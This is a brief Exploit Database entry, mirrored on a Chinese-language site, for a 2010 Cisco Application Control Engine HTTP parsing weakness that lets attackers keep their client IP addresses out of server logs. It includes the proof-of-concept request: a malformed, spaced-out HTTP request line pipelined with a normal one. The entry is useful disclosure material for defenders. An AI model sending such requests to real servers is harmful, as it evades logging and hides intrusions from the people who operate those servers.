Cisco Application Control Engine (ACE) – HTTP Parsing Security

• Exploit Database
• 15 阅读

• 作者： Alexis Tremblay
  日期： 2010-05-07
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/33962/

• source: https://www.securityfocus.com/bid/40002/info
  
  Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.
  
  Attackers can exploit this issue to avoid having client IP addresses logged by servers. 
  
  GET / HTTP / 1 . 1
  HOST: Myserver.com
  CONNECTION: KEEP-ALIVE
  
  GET / HTTP/1.1
  HOST: Myserver.com
  CONNECTION: KEEP-ALIVE